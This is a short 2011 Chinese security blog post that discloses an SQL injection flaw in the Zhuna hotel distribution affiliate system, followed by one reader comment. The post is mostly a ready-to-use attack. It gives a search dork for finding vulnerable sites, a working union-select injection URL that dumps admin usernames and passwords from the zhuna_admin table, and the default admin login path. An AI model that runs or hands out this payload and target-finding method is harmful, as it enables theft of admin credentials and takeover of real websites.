住哪网酒店分销联盟系统SQL注入漏洞

Search:inurl:index.php?m=hotelinfo

注入EXP:
http://yunsec.net/index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password

),3,4,5,6,7,8,9,10%20from%20zhuna_admin

默认后台:index.php?m=admin/login

本文固定链接: https://www.unhonker.com/bug/214.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2011年09月08日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: 住哪网酒店分销联盟系统SQL注入漏洞 | 90' s Blog|关注网络信息安全

住哪网酒店分销联盟系统SQL注入漏洞:目前有1 条留言

  1. 沙发
    solar-panel:

    呵呵,内容写的很到位,感觉很好,收藏一下,谢谢版主。我是经常来拜访你的访问者之一哦,今天忍不住留言了。

    2011-09-09 14:46

发表评论

您必须 [ 登录 ] 才能发表留言!